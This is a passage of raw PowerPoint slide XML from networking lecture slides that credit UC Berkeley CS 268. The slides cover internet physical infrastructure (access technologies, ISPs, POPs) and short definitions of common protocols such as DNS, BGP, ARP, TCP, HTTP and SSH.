                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951648E0-EDE6-5E47-83D1-1ECD2F5643AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7373160" y="2655732"/>
            <a:ext cx="610058"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7031" name="Picture 1495">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31857BB6-D677-5045-B82D-527F24338E3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824" y="2522628"/>
            <a:ext cx="364450"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7032" name="Picture 1496">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C39B73FD-A0EA-CD41-8335-E6C22FE5BC1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6149" y="2997999"/>
            <a:ext cx="366035"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7033" name="Text Box 1497">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B187E4C0-4A12-F946-8740-79864A09B3B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7457142" y="1605166"/>
            <a:ext cx="594212" cy="39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algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="915988" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1373188" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1831975" algn="l" defTabSz="915988">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2289175" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2746375" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3203575" defTabSz="915988" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3660775" defTabSz="9159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996" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67034" name="Picture 1498">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F6CE8CB-3288-7F45-8AD6-65E53B96BE1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414" y="2742884"/>
            <a:ext cx="364450"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7035" name="Picture 1499">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36FEF915-C567-784F-9877-A85FA4713D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9590" y="2997999"/>
            <a:ext cx="366034"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7036" name="Line 1500">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41296817-629A-6842-92AC-89CF10611AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8599614" y="2061521"/>
            <a:ext cx="457940" cy="305821"/>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7037" name="Picture 1501">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2312EA-38CD-8B40-A931-8910A705C2C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6806" y="1974369"/>
            <a:ext cx="366035"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7038" name="Picture 1502">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D116EA-715D-5C45-9317-EE8AAD40D56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588" y="2283360"/>
            <a:ext cx="364450"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7039" name="Rectangle 1503">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C75563F3-4045-5142-B5FD-A9D0557C67AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222422" y="68707"/>
            <a:ext cx="11333396" cy="760591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91408" tIns="45704" rIns="91408" bIns="45704" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internet Physical Infrastructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67052" name="Rectangle 1516">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E597F8-2D23-6E46-9CB7-D15DEFD6F0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537344" y="3857306"/>
            <a:ext cx="2205715" cy="2134410"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91408" tIns="45704" rIns="91408" bIns="45704" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Residential Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cable modem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Satellite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67053" name="Rectangle 1517">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D89CDAAB-A299-404B-9458-84FCAF27B6F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3731828" y="3879017"/>
            <a:ext cx="3498721" cy="213441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lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="687388" indent="-230188" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1144588" indent="-228600" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1544638" indent="-171450" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="¢"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2003425" indent="-171450" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="24606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6pPr>
            <a:lvl7pPr marL="29178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7pPr>
            <a:lvl8pPr marL="33750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8pPr>
            <a:lvl9pPr marL="38322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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1996" dirty="0"/>
              <a:t>Enterprise/ISP access, Backbone transmission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>T1/T3, DS-1 DS-3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>OC-3, OC-12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>ATM vs. SONET, vs. WDM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1996" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67054" name="Rectangle 1518">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4AF69E-3DA8-774B-8F1F-8E298F541385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7664446" y="3879017"/>
            <a:ext cx="3498721" cy="213441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lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="687388" indent="-230188" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1144588" indent="-228600" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1544638" indent="-171450" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="¢"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2003425" indent="-171450" algn="l" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="»"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="24606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6pPr>
            <a:lvl7pPr marL="29178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7pPr>
            <a:lvl8pPr marL="33750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8pPr>
            <a:lvl9pPr marL="38322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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1996" dirty="0"/>
              <a:t>Campus network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>Ethernet, ATM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1996" dirty="0"/>
              <a:t>Internet Service Providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>access, regional, backbone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>Point of Presence (POP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1797" dirty="0"/>
              <a:t>Network Access Point (NAP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1996" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5584C3E5-AFF2-0247-9071-BB08D9C3CC29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509D9FE1-38CE-4540-B67B-8F9D8D395B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6356350"/>
            <a:ext cx="658141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UC, Berkeley, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS 268: Graduate Computer Networks, Ian Stoica</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882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43479"/>
            <a:ext cx="10565026" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computer networking: important protocols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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCAB5593-FB39-3E46-B9B1-9019B64F34DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2140557"/>
            <a:ext cx="1115815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internet relies on many networking protocols and services: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DNS – Name service maps name (math.berkeley.edu) to IP address (128.32.213.142)</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BGP - Border gateway protocol, used to determine route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ARP – Address resolution protocol, associates MAC identifier of device with its IP address.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IP – communications protocol to send datagrams between IP addresses.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TCP – communications protocol to send reliable, ordered, error checked messages over IP.</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HTTP/HTTPS – applications level protocol to send html request/response messages.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Telnet – virtual terminal connection (insecure)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SSH – secure remote shell protocol</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SMTP – mail delivery protocol</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POP – mail retrieval protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2359110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9D81EB9-AC0D-5E4A-B012-DE661AE186B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991629" y="152079"/>
            <a:ext cx="10208741" cy="829598"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inter-networking Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8196" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC38F882-486A-9848-B2DD-B2D727F77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7579"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1885950"/>
            <a:ext cx="78486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A51E660-B515-DB49-88CF-C479BBB43E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65227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74623"/>
            <a:ext cx="11305622" cy="966920"/>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1, general advice and booting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2197002"/>
